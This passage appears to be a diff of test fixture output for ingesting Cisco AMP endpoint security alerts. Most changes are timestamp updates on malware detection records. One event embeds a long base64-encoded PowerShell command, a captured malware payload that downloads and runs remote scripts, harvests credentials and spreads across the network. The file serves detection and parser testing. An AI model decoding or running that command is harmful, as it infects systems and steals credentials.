Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2227,7 +2227,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010775500Z", + "ingested": "2021-12-14T14:40:52.874147802Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2311,7 +2311,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010780800Z", + "ingested": "2021-12-14T14:40:52.874148156Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2395,7 +2395,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010785200Z", + "ingested": "2021-12-14T14:40:52.874148506Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2470,7 +2470,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010789100Z", + "ingested": "2021-12-14T14:40:52.874148917Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"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\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E 
JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIA
YQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkA
bgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0A
LgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8A
bwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAA
aQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAG